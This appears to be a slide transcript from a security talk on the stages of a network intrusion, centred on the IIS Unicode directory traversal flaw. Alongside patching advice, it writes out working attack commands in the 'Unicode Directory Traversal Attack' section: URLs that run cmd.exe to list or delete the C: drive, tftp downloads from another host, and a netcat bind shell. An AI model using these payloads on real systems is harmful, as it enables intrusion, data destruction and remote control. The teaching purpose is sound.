Transcript perl -x unicodexecute.pl 172.16.10.5:80 tftp -i 172.10

Expose the Vulnerability
Paul Hogan
Ward Solutions
Session Prerequisites
Hands-on experience with Windows 2000 or Windows
Server 2003
Working knowledge of networking, including basics
of security
Basic knowledge of network security-assessment strategies
Level 300
Anatomy of a Hack
Information Gathering / Profiling
 nslookup, whois
Probe / Enumerating
 Superscan, nmap, nessus, nikto, banner grabbing, OS
fingerprinting
Attack
 Unicode directory traversal
Advancement
Entrenchment
Infiltration/Extraction
nslookup
RIPE Whois
superscan
Simple Command Line Utilities
net view \\172.16.10.5
net use \\172.16.10.5
net use \\172.16.10.5 "" /u:"" red button vulnerability
net view \\172.16.10.5
nbtstat -A 172.16.10.5
nbtscan -r 172.16.10.0/24
net use \\172.16.10.5 "" /u:guest
nmap nessus
nikto
Overview
Name: Microsoft IIS 4.0/5.0 Extended Unicode Directory
Traversal Vulnerability. (BugTraq ID 1806)
Operating System: Windows NT 4.0 (+ IIS 4.0) and
Windows 2000 (+ IIS 5.0).
Brief Description: A particular type of malformed URL
could be used to access files and directories beyond
the web folders. This would potentially enable a
malicious user to gain privileges commensurate with
those of a locally logged-on users. Gaining these
permissions would enable the malicious user to add,
change or delete data, run code already on the server,
or upload new code to the server and run it.
Impacts
If the E-business web server was compromised, the backend
database sever is under threat too. Trust relationship. Same
passwords. Database connection pools. Use web server and
database server as a relay to connect the outside machine
with the internal machines. Then firewall is circumvented……
If the compromised web server is a site for software
distribution, add Trojans or Zombie codes to the
downloadable software, then you can control all the machines
which download software from that website…..
Solutions
Install patches as soon as possible
 Patch Management: SMS/SUS/MBSA
Disable NetBIOS over TCP/IP.
Be sure that the IUSR_machinename account
does not have write access to any files on the
server.
Unicode Directory Traversal Attack
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\+/s
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\*.*
perl -x unicodexecute.pl 172.16.10.5:80 dir
perl -x unicodexecute.pl 172.16.10.5:80 tftp -i 172.10.10.21 GET *.*
perl -x unicodexecute.pl 172.16.10.5:80 nc -L –p555 -d -e cmd.exe
c:\nc 192.168.1.2 443
How To Get Your Network Hacked In 10 Easy Steps
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Don’t patch anything
Run unhardened applications
Logon everywhere as a domain admin
Open lots of holes in the firewall
Allow unrestricted internal traffic
Allow all outbound traffic
Don’t harden servers
Use lame passwords
Use high-level service accounts, in multiple places
Assume everything is OK
The moral
Initial entry is everything
Most networks are designed like egg shells
Hard and crunchy on the outside
Soft and chewy on the inside
Once an attacker is inside the network you can…
Update resume
Hope he does a good job running it
 Drain the network